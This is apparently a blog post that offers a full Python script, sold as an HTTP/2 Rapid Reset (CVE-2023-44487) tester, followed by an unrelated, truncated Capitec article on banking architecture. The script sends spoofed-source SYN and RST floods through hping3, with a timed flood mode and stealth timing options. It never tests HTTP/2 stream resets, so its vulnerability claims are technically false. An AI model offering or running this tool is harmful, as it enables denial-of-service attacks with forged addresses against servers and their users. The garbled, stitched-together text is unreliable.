# Apache: Disable HTTP/2 module
# a2dismod http2

Note: This reduces performance benefits but eliminates the vulnerability.

Testing Script for HTTP/2 Rapid Reset Vulnerabilities on macOS

Below is a parameterized Python script that tests your web servers using hping3 for packet crafting. This script is specifically optimized for macOS and can spoof source IP addresses from a CIDR block to simulate distributed attacks. Using hping3 ensures IP spoofing works consistently across different network environments.

Prerequisites for macOS

Installation Steps:

# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install hping3
brew install hping

Note: This script requires root/sudo privileges for packet crafting and IP spoofing.

The Testing Script

cat > http2rapidresettester_macos.py << 'EOF'
#!/usr/bin/env python3
"""
HTTP/2 Rapid Reset Vulnerability Tester for macOS
Tests web servers for susceptibility to CVE-2023-44487
Uses hping3 for packet crafting with source IP spoofing from CIDR block

Usage:
    sudo python3 http2rapidresettester_macos.py --host example.com --port 443 --cidr 192.168.1.0/24 --packets 1000

Requirements:
    brew install hping
"""

import argparse
import subprocess
import random
import ipaddress
import time
import sys
import os
import platform
from typing import List, Optional

class HTTP2RapidResetTester:
    def __init__(
        self,
        host: str,
        port: int = 443,
        cidr_block: str = None,
        timeout: int = 30,
        verbose: bool = False,
        interface: str = None
    ):
        self.host = host
        self.port = port
        self.cidr_block = cidr_block
        self.timeout = timeout
        self.verbose = verbose
        self.interface = interface
        self.source_ips: List[str] = []

        # Verify running on macOS
        if platform.system() != 'Darwin':
            print("WARNING: This script is optimized for macOS")

        if not self.check_hping3():
            raise RuntimeError("hping3 is not installed. Install with: brew install hping")

        if not self.check_root():
            raise RuntimeError("This script requires root privileges (use sudo)")

        if cidr_block:
            self.generate_source_ips()
            
        if interface:
            self.verify_interface()

    def check_hping3(self) -> bool:
        """Check if hping3 is installed"""
        try:
            result = subprocess.run(
                ['which', 'hping3'],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode == 0:
                return True

            # Try alternative hping command
            result = subprocess.run(
                ['which', 'hping'],
                capture_output=True,
                text=True,
                timeout=5
            )
            return result.returncode == 0
        except Exception as e:
            print(f"Error checking for hping3: {e}")
            return False

    def check_root(self) -> bool:
        """Check if running with root privileges"""
        return os.geteuid() == 0

    def verify_interface(self):
        """Verify that the specified network interface exists"""
        try:
            result = subprocess.run(
                ['ifconfig', self.interface],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode != 0:
                raise RuntimeError(f"Network interface '{self.interface}' not found")
            
            if self.verbose:
                print(f"Using network interface: {self.interface}")
                
        except subprocess.TimeoutExpired:
            raise RuntimeError(f"Timeout verifying interface '{self.interface}'")
        except FileNotFoundError:
            raise RuntimeError("ifconfig command not found")

    def generate_source_ips(self):
        """Generate list of IP addresses from CIDR block"""
        try:
            network = ipaddress.ip_network(self.cidr_block, strict=False)
            self.source_ips = [str(ip) for ip in network.hosts()]

            if len(self.source_ips) == 0:
                # Handle /32 or /31 networks
                self.source_ips = [str(ip) for ip in network]

            print(f"Generated {len(self.source_ips)} source IPs from {self.cidr_block}")

        except ValueError as e:
            print(f"Invalid CIDR block: {e}")
            sys.exit(1)

    def get_random_source_ip(self) -> Optional[str]:
        """Get a random IP address from the CIDR block"""
        if not self.source_ips:
            return None
        return random.choice(self.source_ips)

    def get_hping_command(self) -> str:
        """Determine which hping command is available"""
        result = subprocess.run(['which', 'hping3'], capture_output=True, text=True)
        if result.returncode == 0:
            return 'hping3'
        return 'hping'

    def craft_syn_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP SYN packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-S',  # SYN flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting SYN packet: {e}")
            return False

    def craft_rst_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP RST packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-R',  # RST flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting RST packet: {e}")
            return False

    def rapid_reset_test(
        self,
        num_packets: int,
        packets_per_ip: int = 10,
        reset_ratio: float = 1.0,
        delay_between_bursts: float = 0.01
    ) -> dict:
        """
        Perform rapid reset attack simulation

        Args:
            num_packets: Total number of packets to send
            packets_per_ip: Number of packets per source IP before switching
            reset_ratio: Ratio of RST packets to SYN packets (1.0 = equal)
            delay_between_bursts: Delay between packet bursts in seconds

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None
        }

        print(f"\nStarting HTTP/2 Rapid Reset test:")
        print(f"   Total packets: {num_packets}")
        print(f"   Packets per source IP: {packets_per_ip}")
        print(f"   RST to SYN ratio: {reset_ratio}")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
            print(f"   Available source IPs: {len(self.source_ips)}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        used_ips = set()
        packets_sent = 0
        current_ip_packets = 0
        current_source_ip = self.get_random_source_ip()

        if current_source_ip:
            used_ips.add(current_source_ip)

        try:
            while packets_sent < num_packets:
                # Switch to new source IP if needed
                if current_ip_packets >= packets_per_ip and self.source_ips:
                    current_source_ip = self.get_random_source_ip()
                    used_ips.add(current_source_ip)
                    current_ip_packets = 0

                # Send SYN packet
                if self.craft_syn_packet(current_source_ip, count=1):
                    results['syn_packets'] += 1
                    results['total_packets'] += 1
                    packets_sent += 1
                    current_ip_packets += 1
                else:
                    results['failed_packets'] += 1

                # Send RST packet based on ratio
                if random.random() < reset_ratio:
                    if self.craft_rst_packet(current_source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                        packets_sent += 1
                        current_ip_packets += 1
                    else:
                        results['failed_packets'] += 1

                # Progress indicator
                if packets_sent % 100 == 0:
                    elapsed = time.time() - results['start_time']
                    rate = packets_sent / elapsed if elapsed > 0 else 0
                    print(f"Progress: {packets_sent}/{num_packets} packets "
                          f"({rate:.0f} pps) | "
                          f"Unique IPs: {len(used_ips)}")

                # Small delay between bursts
                if delay_between_bursts > 0:
                    time.sleep(delay_between_bursts)

        except KeyboardInterrupt:
            print("\nTest interrupted by user")
        except Exception as e:
            print(f"\nTest error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def flood_mode(
        self,
        duration: int = 60,
        packet_rate: int = 1000
    ) -> dict:
        """
        Perform continuous flood attack for specified duration

        Args:
            duration: Duration of the flood in seconds
            packet_rate: Target packet rate per second

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None,
            'duration': duration
        }

        print(f"\nStarting flood mode:")
        print(f"   Duration: {duration} seconds")
        print(f"   Target rate: {packet_rate} packets/second")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        end_time = time.time() + duration
        used_ips = set()

        try:
            while time.time() < end_time:
                batch_start = time.time()

                # Send batch of packets
                for _ in range(packet_rate // 10):  # Batch in 0.1s intervals
                    source_ip = self.get_random_source_ip()
                    if source_ip:
                        used_ips.add(source_ip)

                    # Send SYN
                    if self.craft_syn_packet(source_ip, count=1):
                        results['syn_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                    # Send RST
                    if self.craft_rst_packet(source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                # Rate limiting
                batch_duration = time.time() - batch_start
                sleep_time = 0.1 - batch_duration
                if sleep_time > 0:
                    time.sleep(sleep_time)

                # Progress update
                elapsed = time.time() - results['start_time']
                remaining = end_time - time.time()
                rate = results['total_packets'] / elapsed if elapsed > 0 else 0

                print(f"Elapsed: {elapsed:.1f}s | Remaining: {remaining:.1f}s | "
                      f"Rate: {rate:.0f} pps | Total: {results['total_packets']}")

        except KeyboardInterrupt:
            print("\nFlood interrupted by user")
        except Exception as e:
            print(f"\nFlood error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def display_results(self, results: dict):
        """Display test results in a readable format"""
        duration = results['end_time'] - results['start_time']

        print("\n" + "=" * 60)
        print("TEST RESULTS")
        print("=" * 60)
        print(f"Total packets sent:      {results['total_packets']}")
        print(f"SYN packets:             {results['syn_packets']}")
        print(f"RST packets:             {results['rst_packets']}")
        print(f"Failed packets:          {results['failed_packets']}")
        print(f"Unique source IPs used:  {results['unique_source_ips']}")
        print(f"Test duration:           {duration:.2f}s")

        if duration > 0:
            rate = results['total_packets'] / duration
            print(f"Average packet rate:     {rate:.0f} packets/second")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        if results['failed_packets'] > results['total_packets'] * 0.5:
            print("WARNING: High failure rate detected")
            print("  Check network connectivity and firewall rules")
        elif results['total_packets'] > 0:
            print("Test completed successfully")
            print("  Monitor target server for:")
            print("    Connection state table exhaustion")
            print("    CPU/memory utilization spikes")
            print("    Application performance degradation")

        print("=" * 60 + "\n")

def main():
    parser = argparse.ArgumentParser(
        description='Test web servers for HTTP/2 Rapid Reset vulnerability (macOS version)',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test with CIDR block
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

  # Specify network interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

  # Flood mode for 60 seconds
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 10.0.0.0/16 --flood --duration 60

  # High intensity test with specific interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 172.16.0.0/12 --interface en1 --packets 10000 --packetsperip 50

  # Test without IP spoofing
  sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Prerequisites:
  1. Install hping3: brew install hping
  2. Run with sudo for raw socket access
  3. Check available interfaces: ifconfig

Note: hping3 crafts spoofed packets reliably, but upstream routers or ISPs performing egress filtering may still drop packets with spoofed source addresses.
        """
    )

    # Connection parameters
    parser.add_argument('--host', required=True, help='Target hostname or IP address')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--cidr', help='CIDR block for source IP spoofing (e.g., 192.168.1.0/24)')
    parser.add_argument('--interface', help='Network interface to use (e.g., en0, en1). Optional.')
    parser.add_argument('--timeout', type=int, default=30, help='Command timeout in seconds (default: 30)')

    # Test mode parameters
    parser.add_argument('--flood', action='store_true', help='Enable flood mode (continuous attack)')
    parser.add_argument('--duration', type=int, default=60, help='Duration for flood mode in seconds (default: 60)')
    parser.add_argument('--packetrate', type=int, default=1000, help='Target packet rate for flood mode (default: 1000)')

    # Normal mode parameters
    parser.add_argument('--packets', type=int, default=1000,
                       help='Total number of packets to send (default: 1000)')
    parser.add_argument('--packetsperip', type=int, default=10,
                       help='Number of packets per source IP before switching (default: 10)')
    parser.add_argument('--resetratio', type=float, default=1.0,
                       help='Ratio of RST to SYN packets (default: 1.0)')
    parser.add_argument('--burstdelay', type=float, default=0.01,
                       help='Delay between packet bursts in seconds (default: 0.01)')

    # Other options
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    # Print header
    print("=" * 60)
    print("HTTP/2 Rapid Reset Vulnerability Tester for macOS")
    print("CVE-2023-44487")
    print("Using hping3 for packet crafting")
    print("=" * 60)
    print(f"Target: {args.host}:{args.port}")
    if args.cidr:
        print(f"Source CIDR: {args.cidr}")
    else:
        print("Source IP: Local IP (no spoofing)")
    if args.interface:
        print(f"Interface: {args.interface}")
    print("=" * 60)

    # Create tester instance
    try:
        tester = HTTP2RapidResetTester(
            host=args.host,
            port=args.port,
            cidr_block=args.cidr,
            timeout=args.timeout,
            verbose=args.verbose,
            interface=args.interface
        )
    except RuntimeError as e:
        print(f"ERROR: {e}")
        sys.exit(1)

    try:
        if args.flood:
            # Run flood mode
            results = tester.flood_mode(
                duration=args.duration,
                packet_rate=args.packetrate
            )
        else:
            # Run normal rapid reset test
            results = tester.rapid_reset_test(
                num_packets=args.packets,
                packets_per_ip=args.packetsperip,
                reset_ratio=args.resetratio,
                delay_between_bursts=args.burstdelay
            )

        # Display results
        tester.display_results(results)

    except KeyboardInterrupt:
        print("\nTest interrupted by user")
        sys.exit(0)
    except Exception as e:
        print(f"\nFatal error: {e}")
        import traceback
        if args.verbose:
            traceback.print_exc()
        sys.exit(1)

if __name__ == '__main__':
    main()
EOF
chmod +x http2rapidresettester_macos.py

Using the Testing Script on macOS

Summary of usage:

# Use specific interface
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

# Use WiFi interface (typically en0 on MacBooks)
sudo python3 http2rapidresettester_macos.py --host example.com --interface en0 --packets 500

# Use Ethernet interface
sudo python3 http2rapidresettester_macos.py --host example.com --interface en1 --cidr 10.0.0.0/16 --flood --duration 30

# Without interface (uses default routing)
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Test your server with CIDR block spoofing:

sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Advanced Examples

High intensity test (use cautiously in test environments):

sudo python3 http2rapidresettester_macos.py \
    --host staging.example.com \
    --cidr 10.0.0.0/16 \
    --packets 5000 \
    --packetsperip 50

Flood mode for sustained testing:

sudo python3 http2rapidresettester_macos.py \
    --host test.example.com \
    --cidr 172.16.0.0/12 \
    --flood \
    --duration 60 \
    --packetrate 500

Test without IP spoofing:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000

Verbose mode for debugging:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 100 \
    --verbose

Gradual escalation test (start small, increase if needed):

# Start with 50 packets
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 50

# If server handles it well, increase
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 200

# Final aggressive test
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Interpreting Results

The script outputs packet statistics including the following (a hypothetical sketch of the corresponding fields appears after the list):

  • Total packets sent (SYN and RST combined)
  • Number of SYN packets
  • Number of RST packets
  • Failed packet count
  • Number of unique source IPs used
  • Average packet rate
  • Test duration
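
As a rough mental model, those statistics map onto a structure like this. The field names are assumptions for illustration, not the script's actual attributes:

# Hypothetical shape of the statistics reported above; field names are
# illustrative, not the tester script's actual attributes.
from dataclasses import dataclass

@dataclass
class TestResults:
    total_packets: int        # SYN and RST combined
    syn_packets: int
    rst_packets: int
    failed_packets: int
    unique_source_ips: int
    avg_packet_rate: float    # packets per second
    duration_seconds: float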

What to Monitor

Monitor your target server for:

  • Connection state table exhaustion: Check netstat or ss output for connection counts
  • CPU and memory utilization spikes: Use Activity Monitor or top command
  • Application performance degradation: Monitor response times and error rates
  • Firewall or rate limiting triggers: Check firewall logs and rate limiting counters

Protected Server Indicators

  • High failure rate in the test results
  • Server actively blocking or rate limiting connections
  • Firewall rules triggering during test
  • Connection resets from the server

Vulnerable Server Indicators

  • All packets successfully sent with low failure rate
  • No rate limiting or blocking observed
  • Server continues processing all requests
  • Resource utilization climbs steadily

Why hping3 for macOS?

Using hping3 provides several advantages for macOS users:

Universal IP Spoofing Support

  • Consistent behavior: hping3 provides reliable IP spoofing across different network configurations
  • Proven tool: Industry standard for packet crafting and network testing
  • Better compatibility: Works with most network interfaces and routing configurations

macOS Specific Benefits

  • Native support: Works well with macOS network stack
  • Firewall compatibility: Better integration with macOS firewall
  • Performance: Efficient packet generation on macOS

Reliability Advantages

  • Mature codebase: hping3 has been battle tested for decades
  • Active community: Well documented with extensive community support
  • Cross platform: Same tool works on Linux, BSD, and macOS

macOS Installation and Setup

Installing hping3

# Using Homebrew (recommended)
brew install hping

# Verify installation
which hping3
hping3 --version

Firewall Configuration

macOS firewall may need configuration for raw packet injection:

  1. Open System Preferences > Security & Privacy > Firewall
  2. Click “Firewall Options”
  3. Add Python to allowed applications
  4. Grant network access when prompted

Alternatively, for testing environments:

# Temporarily disable firewall (not recommended for production)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off

# Re-enable after testing
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on

Network Interfaces

List available network interfaces:

ifconfig

Common macOS interfaces:

  • en0: Primary Ethernet/WiFi
  • en1: Secondary network interface
  • lo0: Loopback interface
  • bridge0: Bridged interface (if using virtualization)

Best Practices for Testing

  1. Start with staging/test environments: Never run aggressive tests against production without authorization
  2. Coordinate with your team: Inform security and operations teams before testing
  3. Monitor server metrics: Watch CPU, memory, and connection counts during tests
  4. Test during low traffic periods: Minimize impact on real users if testing production
  5. Gradual escalation: Start with conservative parameters and increase gradually
  6. Document results: Keep records of test results and any configuration changes
  7. Have rollback plans: Be prepared to quickly disable testing if issues arise

Troubleshooting on macOS

Error: “hping3 is not installed”

Install hping3 using Homebrew:

brew install hping

Error: “Operation not permitted”

Make sure you are running with sudo:

sudo python3 http2rapidresettester_macos.py [options]

Error: “No route to host”

Check your network connectivity:

ping example.com
traceroute example.com

Verify your network interface is up:

ifconfig en0

Packets Not Being Sent

Possible causes and solutions (a small preflight sketch follows this list):

  1. Firewall blocking: Temporarily disable firewall or add exception
  2. Interface not active: Check ifconfig output
  3. Permission issues: Ensure running with sudo
  4. Wrong interface: Specify the correct interface with --interface (passed to hping3 as its -I flag)
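
A quick preflight check rules out the most common local causes (missing hping3 and insufficient privileges) before blaming the network. The function below is an illustrative sketch, not the tester's actual code:

# Hedged preflight sketch: verify hping3 is present and that we have the root
# privileges raw packet injection requires. Names are illustrative.
import os
import shutil

def preflight_check() -> None:
    if shutil.which("hping3") is None:
        raise RuntimeError("hping3 is not installed (brew install hping)")
    if os.geteuid() != 0:
        raise RuntimeError("Raw packet injection requires root; re-run with sudo")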

Low Packet Rate

Performance optimization tips:

  • Use wired Ethernet instead of WiFi
  • Close other network intensive applications
  • Reduce packet rate target with --packetrate
  • Use smaller CIDR blocks

Monitoring Your Tests

Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

Activity Monitor

Monitor system resources during testing:

  1. Open Activity Monitor (Applications > Utilities > Activity Monitor)
  2. Select “Network” tab
  3. Watch “Packets in” and “Packets out”
  4. Monitor “Data sent/received”
  5. Check CPU usage of Python process

Server Side Monitoring

On your target server, monitor:

# Connection states
netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

# Active connections count
netstat -an | grep ESTABLISHED | wc -l

# SYN_RECV connections
netstat -an | grep SYN_RECV | wc -l

# System resources (this invocation is the macOS form of top; on Linux use 'top -bn1')
top -l 1 | head -10

Understanding IP Spoofing with hping3

How It Works

hping3 creates raw packets at the network layer, allowing you to specify arbitrary source IP addresses. This bypasses normal TCP/IP stack restrictions.
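
As a rough illustration of what such a call looks like from Python, a spoofed SYN could be sent as shown below. The wrapper function is hypothetical; the hping3 flags -S, -a, -p, -c and -I are standard options:

# Hedged sketch of spoofed-SYN generation via hping3; the wrapper function is
# illustrative, not the tester script's actual implementation.
import subprocess
from typing import Optional

def send_spoofed_syn(target: str, port: int, spoofed_source: str,
                     count: int = 1, interface: Optional[str] = None) -> bool:
    # -S crafts TCP SYN packets; -a sets an arbitrary (spoofed) source address,
    # which works because hping3 writes raw packets below the TCP/IP stack.
    cmd = ["hping3", "-S", "-a", spoofed_source,
           "-p", str(port), "-c", str(count), target]
    if interface:
        cmd += ["-I", interface]   # pin the outbound interface (e.g. en0)
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
    return result.returncode == 0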

Network Requirements

For IP spoofing to work effectively:

  • Local networks: Works best on LANs you control
  • Direct routing: Requires direct layer 2 access
  • No NAT interference: NAT devices may rewrite source addresses
  • Router configuration: Some routers filter spoofed packets (BCP 38)

Testing Without Spoofing

If IP spoofing is not working in your environment:

# Test without CIDR block
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

# This still validates:
# - Rate limiting configuration
# - Stream management
# - Server resilience
# - Resource consumption patterns

Advanced Configuration Options

Custom Packet Timing

# Slower, more stealthy testing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 500 \
    --burstdelay 0.1  # 100ms between bursts

# Faster, more aggressive
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --burstdelay 0.001  # 1ms between bursts

Custom RST to SYN Ratio

# More SYN packets (mimics connection attempts)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 0.3  # 1 RST for every 3 SYN

# Equal SYN and RST (classic rapid reset)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 1.0

Targeting Different Ports

# Test HTTPS (port 443)
sudo python3 http2rapidresettester_macos.py --host example.com --port 443

# Test HTTP/2 on custom port
sudo python3 http2rapidresettester_macos.py --host example.com --port 8443

# Test load balancer
sudo python3 http2rapidresettester_macos.py --host lb.example.com --port 443

Understanding the Attack Surface

When testing your infrastructure:

  1. Test all HTTP/2 endpoints: Web servers, load balancers, API gateways
  2. Verify CDN protection: Test both origin and CDN endpoints
  3. Test direct vs proxied: Compare protection at different layers
  4. Validate rate limiting: Ensure limits trigger at expected thresholds
  5. Confirm monitoring: Verify alerts trigger correctly

Conclusion

The HTTP/2 Rapid Reset vulnerability represents a significant threat to web infrastructure, but with proper patching, configuration, and monitoring, you can effectively protect your systems. This macOS optimized testing script using hping3 allows you to validate your defenses in a controlled manner with reliable IP spoofing capabilities across different network environments.

Remember that security is an ongoing process. Regularly:

  • Update your web server and proxy software
  • Review and adjust HTTP/2 configuration limits
  • Monitor for unusual traffic patterns
  • Test your defenses against emerging threats

By staying vigilant and proactive, you can maintain a resilient web presence capable of withstanding sophisticated DDoS attacks.

This blog post and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.


Why Bigger Banks Were Historically More Fragile and Why Architecture Determines Resilience

1. Size Was Once Mistaken for Stability

For most of modern banking history, stability was assumed to increase with size. The thinking was simple: the bigger you are, the more resources you can apply to problems. Larger banks had more capital, more infrastructure, and more people. In a pre-cloud world, this assumption appeared reasonable.

In practice, the opposite was often true.

Before cloud computing and elastic infrastructure, the larger a bank became, the more unstable it was under stress and the harder it was to maintain any kind of delivery cadence. Scale amplified fragility. In 2025, architecture (not size) has become the primary determinant of banking stability.

2. Scale, Fragility, and Quantum Entanglement

Traditional banking platforms were built on vertically scaled systems: mainframes, monolithic databases, and tightly coupled integration layers. These systems were engineered for control and predictability, not for elasticity or independent change.

As banks grew, they didn’t just add clients. They added products. Each new product introduced new dependencies, shared data models, synchronous calls, and operational assumptions. Over time, this created a state best described as quantum entanglement.

In this context, quantum entanglement refers to systems where:

  • Products cannot change independently
  • A change in one area unpredictably affects others
  • The full impact of change only appears under real load
  • Cause and effect are separated by time, traffic, and failure conditions

The larger the number of interdependent products, the more entangled the system becomes.

2.1 Why Entanglement Reduces Stability

As quantum entanglement increases, change becomes progressively riskier. Even small modifications require coordination across multiple teams and systems. Release cycles slow and defensive complexity increases.

Recovery also becomes harder. When something breaks, rolling back a single change is rarely sufficient because multiple products may already be in partially failed or inconsistent states.

Fault finding degrades as well. Logs, metrics, and alerts point in multiple directions. Symptoms appear far from root causes, forcing engineers to chase secondary effects rather than underlying faults.

Most importantly, blast radius expands. A fault in one product propagates through shared state and synchronous dependencies, impacting clients who weren’t using the originating product at all.

The paradox is that the very success of large banks (broad product portfolios) becomes a direct contributor to instability.

3. Why Scale Reduced Stability in the Pre-Cloud Era

Before cloud computing, capacity was finite, expensive, and slow to change. Systems scaled vertically, and failure domains were large by design.

As transaction volumes and product entanglement increased, capacity cliffs became unavoidable. Peak load failures became systemic rather than local. Recovery times lengthened and client impact widened.

Large institutions often appeared stable during normal operation but failed dramatically under stress. Smaller institutions appeared more stable largely because they had fewer entangled products and simpler operational surfaces (not because they were inherently better engineered).

Capitec itself experienced this when its core banking SQL database hit a capacity cliff in August 2022. In order to recover the service, close to 100 changes were made, resulting in around 40 hours of downtime. The wider service recovery took weeks, with missed payments and duplicate payments fixed on a case by case basis. It was at this point that Capitec’s leadership drew a line in the sand and decided to totally re-engineer its entire stack from the ground up in AWS. This blog post shares a few nuggets from the engineering journey we went on, and hopefully helps others struggling with the burden of scale and hardened synchronous pathways.

4. Cloud Changed the Equation (But Only When Architecture Changed)

Cloud computing made it possible to break entanglement, but only for organisations willing to redesign systems to exploit it.

Horizontal scaling, availability zone isolation, managed databases, and elastic compute allow products to exist as independent domains rather than tightly bound extensions of a central core.

Institutions that merely moved infrastructure to the cloud without breaking product entanglement continue to experience the same instability patterns (only on newer hardware).

5. An Architecture Designed to Avoid Entanglement

Capitec represents a deliberate rejection of quantum entanglement.

Its entire App production stack is cloud native on AWS, Kubernetes, Kafka and Postgres. The platform is well advanced in rolling out new Java 25 runtimes, alongside ahead of time (AOT) optimisation to further reduce scale latency, improve startup characteristics, and increase predictability under load. All Aurora Serverless clusters are set up with read replicas, offloading read pressure from write paths. All workloads are deployed across three availability zones, ensuring resilience. Database access is via the AWS JDBC wrapper, which enables extremely rapid failovers outside of DNS TTLs.

Crucially, products are isolated by design. There is no central product graph where everything depends on everything else. But, a word of caution, we are “not there yet”. We will always have edges that can hurt, and when you hit an edge at speed, it is sometimes hard to get back up on your feet. Often the downtime you experience simply results in pent up demand. Put another way, the volume that took your systems offline is now significantly LESS than the volume that’s waiting for you once you recover! This means that you somehow have to magically add capacity, or optimise code, during an outage in order to recover the service. You will often see the “Rate Limiting” fan club put a foot forward when I discuss burst recoverability. I personally don’t buy this for single entity services (for a complex set of reasons). For someone like AWS, it absolutely makes sense to carry the enormous complexity of guarding services with rate limits. But I don’t believe the same is true for a single entity ecosystem; in these instances, offloading is normally a purer pathway.

6. Write Guarding as a Stability Primitive

Capitec’s mobile and digital platforms employ a deliberate write guarding strategy.

Read only operations (such as logging into the app) are explicitly prevented from performing inline write operations. Activities like audit logging, telemetry capture, behavioural flags, and notification triggers are never executed synchronously on high volume read paths.

Instead, these concerns are offloaded asynchronously using Amazon MSK (Managed Streaming for Apache Kafka) or written to in memory data stores such as Valkey, where they can be processed later without impacting the user journey.

This design completely removes read-write contention from critical paths. Authentication storms, balance checks, and session validation no longer compete with persistence workloads. Under load, read performance remains stable because it is not coupled to downstream write capacity.

Critically, write guarding prevents database maintenance pressure (such as vacuum activity) from leaking into high volume events like logins. Expensive background work remains isolated from customer facing read paths.

Write guarding turns one of the most common failure modes in large banking systems (read traffic triggering hidden writes) into a non event. Stability improves not by adding capacity, but by removing unnecessary coupling.
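
A minimal Python sketch of this pattern is shown below, assuming a Kafka client such as confluent-kafka. The production stack described here is Java on MSK; the broker address, topic name, and handler are illustrative, not Capitec’s code:

# Write-guarding sketch: the read path never performs an inline write; side
# effects are emitted as events for later processing. Illustrative only.
import json
from confluent_kafka import Producer   # example client; an assumption, not the actual stack

producer = Producer({"bootstrap.servers": "msk-broker:9092"})   # placeholder broker

def read_balance_from_replica(account_id: str) -> float:
    return 0.0   # stand-in for a query against an Aurora read replica

def handle_balance_check(account_id: str) -> dict:
    balance = read_balance_from_replica(account_id)        # pure read path
    # Audit/telemetry are emitted as events rather than written inline, so the
    # read never waits on downstream persistence or vacuum-pressured tables.
    event = {"type": "balance_check", "account_id": account_id}
    producer.produce("audit-events", json.dumps(event).encode("utf-8"))
    producer.poll(0)   # serve delivery callbacks without blocking the caller
    return {"account_id": account_id, "balance": balance}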

7. Virtual Threads as a Scalability Primitive

